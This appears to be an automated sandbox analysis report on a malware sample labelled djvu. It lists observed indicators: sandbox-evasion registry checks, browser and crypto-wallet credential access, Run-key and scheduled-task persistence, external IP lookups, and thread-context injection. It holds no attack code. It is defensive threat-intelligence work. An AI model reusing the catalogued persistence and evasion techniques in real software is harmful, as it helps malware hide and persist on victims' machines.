djvu | f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7

System Information Discovery

Processes:

7910667.exeDllHost.exe43D5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7910667.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DllHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DllHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	43D5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	43D5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7910667.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Thu11f1187a97f50d9c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Control Panel\International\Geo\Nation	Thu11f1187a97f50d9c.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.exeThu11b9fee5fd5b3c.execmd.exeThu117e9466431bbb9f.execonhost.execmd.execmd.execmd.exeThu1170fdf4c09b1.execmd.execmd.execmd.execmd.exeThu11f1187a97f50d9c.exeThu118c8b4c3885d897d.exeThu11787d2b833e6.exeThu11b9fee5fd5b3c.tmpThu1189012621353ba47.exeSetup.exeThu1170fdf4c09b1.exeThu118c8b4c3885d897d.exeThu118764660749a3b.exeLzmwAqmV.exe

pid	process
1112	setup_x86_x64_install.exe
1128	setup_installer.exe
1128	setup_installer.exe
1128	setup_installer.exe
1128	setup_installer.exe
1128	setup_installer.exe
1128	setup_installer.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
1892	setup_install.exe
948	cmd.exe
1600	cmd.exe
1100	cmd.exe
1100	cmd.exe
2004	Thu11b9fee5fd5b3c.exe
2004	Thu11b9fee5fd5b3c.exe
1096	cmd.exe
576	Thu117e9466431bbb9f.exe
576	Thu117e9466431bbb9f.exe
988	conhost.exe
1640	cmd.exe
1640	cmd.exe
1752	cmd.exe
1752	cmd.exe
1008	cmd.exe
1684	Thu1170fdf4c09b1.exe
1684	Thu1170fdf4c09b1.exe
1552	cmd.exe
1136	cmd.exe
1756	cmd.exe
1756	cmd.exe
1380	cmd.exe
1380	cmd.exe
1680	Thu11f1187a97f50d9c.exe
1680	Thu11f1187a97f50d9c.exe
1652	Thu118c8b4c3885d897d.exe
1652	Thu118c8b4c3885d897d.exe
1736	Thu11787d2b833e6.exe
1736	Thu11787d2b833e6.exe
2004	Thu11b9fee5fd5b3c.exe
760	Thu11b9fee5fd5b3c.tmp
760	Thu11b9fee5fd5b3c.tmp
760	Thu11b9fee5fd5b3c.tmp
688	Thu1189012621353ba47.exe
688	Thu1189012621353ba47.exe
760	Thu11b9fee5fd5b3c.tmp
2068	Setup.exe
2068	Setup.exe
1680	Thu11f1187a97f50d9c.exe
1652	Thu118c8b4c3885d897d.exe
1684	Thu1170fdf4c09b1.exe
2376	Thu1170fdf4c09b1.exe
2376	Thu1170fdf4c09b1.exe
2368	Thu118c8b4c3885d897d.exe
2368	Thu118c8b4c3885d897d.exe
1040	Thu118764660749a3b.exe
1040	Thu118764660749a3b.exe
2832	LzmwAqmV.exe
2832	LzmwAqmV.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2716 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2716	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

sqtvvs.exe13DE.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Windows\CurrentVersion\Run\booster.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\booster.\\booster.exe"	sqtvvs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\48e5a06f-a99e-4ee6-aa69-519deab487be\\13DE.exe\" --AutoStart"	13DE.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	sqtvvs.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

43D5.exe7910667.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	43D5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7910667.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

160 api.2ip.ua
168 api.2ip.ua
360 api.2ip.ua
401 api.2ip.ua
9 ipinfo.io
11 ipinfo.io
12 ip-api.com
40 ipinfo.io
162 api.2ip.ua
333 api.2ip.ua
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

DllHost.exe43D5.exe7910667.exe

pid process

636 DllHost.exe
1560 43D5.exe
1308 7910667.exe
1560 43D5.exe

flow	ioc
160	api.2ip.ua
168	api.2ip.ua
360	api.2ip.ua
401	api.2ip.ua
9	ipinfo.io
11	ipinfo.io
12	ip-api.com
40	ipinfo.io
162	api.2ip.ua
333	api.2ip.ua

pid	process
636	DllHost.exe
1560	43D5.exe
1308	7910667.exe
1560	43D5.exe

Suspicious use of SetThreadContext 34 IoCs

Processes:

Thu1170fdf4c09b1.exeThu118c8b4c3885d897d.exeinst.exetimeout.exe5476993.exepostback.exe13DE.exekerclean.exe13DE.exesqtvvs.exebuild2.exebuild3.exemstsca.exeservices64.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exe13DE.exemstsca.exemstsca.exemstsca.exe13DE.exemstsca.exemstsca.exemstsca.exemstsca.exe13DE.exe

description	pid	process	target process
PID 1684 set thread context of 2376	1684	Thu1170fdf4c09b1.exe	Thu1170fdf4c09b1.exe
PID 1652 set thread context of 2368	1652	Thu118c8b4c3885d897d.exe	Thu118c8b4c3885d897d.exe
PID 3352 set thread context of 3392	3352	inst.exe	inst.exe
PID 3540 set thread context of 3576	3540	timeout.exe	sqtvvs.exe
PID 1696 set thread context of 3848	1696	5476993.exe	5476993.exe
PID 1572 set thread context of 3304	1572	postback.exe	explorer.exe
PID 3260 set thread context of 2072	3260	13DE.exe	13DE.exe
PID 288 set thread context of 2152	288	kerclean.exe	kerclean.exe
PID 1996 set thread context of 3816	1996	13DE.exe	13DE.exe
PID 3560 set thread context of 2220	3560	sqtvvs.exe	sqtvvs.exe
PID 1872 set thread context of 3660	1872	build2.exe	build2.exe
PID 2208 set thread context of 3836	2208	build3.exe	build3.exe
PID 2764 set thread context of 2756	2764	mstsca.exe	mstsca.exe
PID 4072 set thread context of 2416	4072	services64.exe	explorer.exe
PID 2100 set thread context of 1588	2100	mstsca.exe	mstsca.exe
PID 3492 set thread context of 1664	3492	mstsca.exe	mstsca.exe
PID 588 set thread context of 1236	588	mstsca.exe	mstsca.exe
PID 1652 set thread context of 3328	1652	mstsca.exe	mstsca.exe
PID 4088 set thread context of 2492	4088	mstsca.exe	mstsca.exe
PID 3980 set thread context of 3272	3980	mstsca.exe	mstsca.exe
PID 3676 set thread context of 3644	3676	mstsca.exe	mstsca.exe
PID 1096 set thread context of 2668	1096	mstsca.exe	mstsca.exe
PID 3112 set thread context of 3408	3112	mstsca.exe	mstsca.exe
PID 2412 set thread context of 1744	2412	mstsca.exe	mstsca.exe
PID 3052 set thread context of 2284	3052	13DE.exe	13DE.exe
PID 2424 set thread context of 3412	2424	mstsca.exe	mstsca.exe
PID 1448 set thread context of 1684	1448	mstsca.exe	mstsca.exe
PID 1940 set thread context of 2712	1940	mstsca.exe	mstsca.exe
PID 704 set thread context of 1856	704	13DE.exe	13DE.exe
PID 3872 set thread context of 2208	3872	mstsca.exe	mstsca.exe
PID 2752 set thread context of 2656	2752	mstsca.exe	mstsca.exe
PID 3036 set thread context of 1136	3036	mstsca.exe	mstsca.exe
PID 2232 set thread context of 2832	2232	mstsca.exe	mstsca.exe
PID 2568 set thread context of 3444	2568	13DE.exe	13DE.exe

Drops file in Program Files directory 64 IoCs

Processes:

IDM1.tmpsetup_2.tmp

description	ioc	process
File created	C:\Program Files (x86)\Internet Download Manager\scheduler.chm	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_ru.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmbrbtn64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMNetMon.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_ptbr.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\tips.txt	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_ar.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmtdi.inf	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\tips_es.txt	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_vn.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\libcrypto.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\tips_jp.txt	IDM1.tmp
File opened for modification	C:\Program Files (x86)\Internet Download Manager\IDMSetup2.log	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMan.exe	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmwfp.cat	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMFType.dat	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_chn.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_large_3_hdpi15.bmp	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_cht.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.json	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\tips_nl.txt	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmwfp32.sys	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_ar.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_chn2.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\libssl.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\grabber.chm	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmwfp.inf	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_cht.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmBroker.exe	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMEdgeExt.crx	IDM1.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmmzcc.xpi	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_pl.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\tips_gr.txt	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_az.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMGrHlp.exe	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_gr.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMNetMon64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_it.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_kr.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_am.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMGCExt59.crx	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_de.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_nl.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_smallHot_3.bmp	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMVMPrs64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IEGetVL2.htm	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_iw.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMGetAll.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\idm_ptbr.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmcchandler7.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_lao.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\tips_ru.txt	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_id.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_largeHot_3_hdpi15.bmp	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_bn.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\template.lng	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\idmftype.dll	IDM1.tmp
File created	C:\Program Files (x86)\Internet Download Manager\Languages\inst_cz.lng	IDM1.tmp

Drops file in Windows directory 2 IoCs

Processes:

makecab.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20210916204031.cab	makecab.exe
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2924	688	WerFault.exe	Thu1189012621353ba47.exe
3724	2176	WerFault.exe	LivelyScreenRecMa14.exe
3708	916	WerFault.exe	Thu1171b1ca5023f5d2.exe
3284	1696	WerFault.exe	5476993.exe
2464	2808	WerFault.exe	6256900.scr
3024	1796	WerFault.exe	5623931.exe
3672	1856	WerFault.exe	13DE.exe
1448	3444	WerFault.exe	13DE.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

atetbaaatetbaaThu11787d2b833e6.exeatetbaa

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu11787d2b833e6.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	atetbaa

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3108 schtasks.exe
3676 schtasks.exe
3456 schtasks.exe
3844 schtasks.exe
3252 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3952 timeout.exe
3408 timeout.exe
3768 timeout.exe
3540 timeout.exe
2952 timeout.exe
3976 timeout.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3276 taskkill.exe
3100 taskkill.exe
3584 taskkill.exe
3380 taskkill.exe
2336 taskkill.exe
3028 taskkill.exe

pid	process
3108	schtasks.exe
3676	schtasks.exe
3456	schtasks.exe
3844	schtasks.exe
3252	schtasks.exe

pid	process
3952	timeout.exe
3408	timeout.exe
3768	timeout.exe
3540	timeout.exe
2952	timeout.exe
3976	timeout.exe

pid	process
3276	taskkill.exe
3100	taskkill.exe
3584	taskkill.exe
3380	taskkill.exe
2336	taskkill.exe
3028	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 104f78e13aabd701	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0cf3de2821c1b4396907f218d77eb0800000000020000000000106600000001000020000000a91a25e27fe1465052f04e728c408400763568ff0b991ea9d7c90f9d3e1472bb000000000e8000000002000020000000e865118122677815abb73f8e458a2c808cefe2d85d1ef1e4e71ac3b016f4d73d20000000dcbb870c640566467bf1259aa852104f0953e69ca935408603ee9dd48d9c634140000000ac9f33a11d96359b46e19e55bb06cbc8b292dda5d9a4a04fd952d8476e364995638a4d1d092ffad1ca498975de8a0766e6e867f245bb2732adf77aaad3c26135	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD942B61-172D-11EC-9DFA-560467844583} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e0cf3de2821c1b4396907f218d77eb08000000000200000000001066000000010000200000001d5f2b6cfc3851f866cdef638ab41db815365081da137cf4e3b14b0627b4dc40000000000e8000000002000020000000e49a6d9f702ce692e8ccc95bf01e7fbefbd0ade74863b987193e6a74a1f9a3e590000000d45f67a7d94d601587b855902578e58367a7a3db6c3fc591a923e782b5f595c3284d5a6b0caa45c07b86a8882e09aa8c945846e2263abaf9beae3468e7bb3a83ebf2e4e0686285dcf6c4ed8671dcd8dfe3ebf01e5cec8406f4b9f1a89f6332c2615e35e1f5eb9040e264aebd2281b4307ec4424124440ee4f2a325df4c01ef91c44b02107b09aa42cfb0395265aa301240000000de7e7cb545bc9181d4daae107c1b4223e6bd3c7c9a0495374f3260f2f54ef52c1322e5604b18d773e51a4dd88e71fa0a939dbb81739ea818eedbaf8a78aa89e3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338589684"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

LzmwAqmV.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-412 = "東アフリカ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-385 = "ナミビア標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-381 = "南アフリカ夏時間"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-682 = "東オーストラリア標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-742 = "ニュージーランド標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-681 = "東オーストラリア夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-51 = "グリーンランド夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-541 = "ミャンマー夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-222 = "アラスカ標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-141 = "カナダ中部夏時間"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-832 = "SA 東部標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-242 = "サモア標準時"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\6CF876C7\C:\Windows\system32\,@tzres.dll,-622 = "韓国 (標準時)"	LzmwAqmV.exe
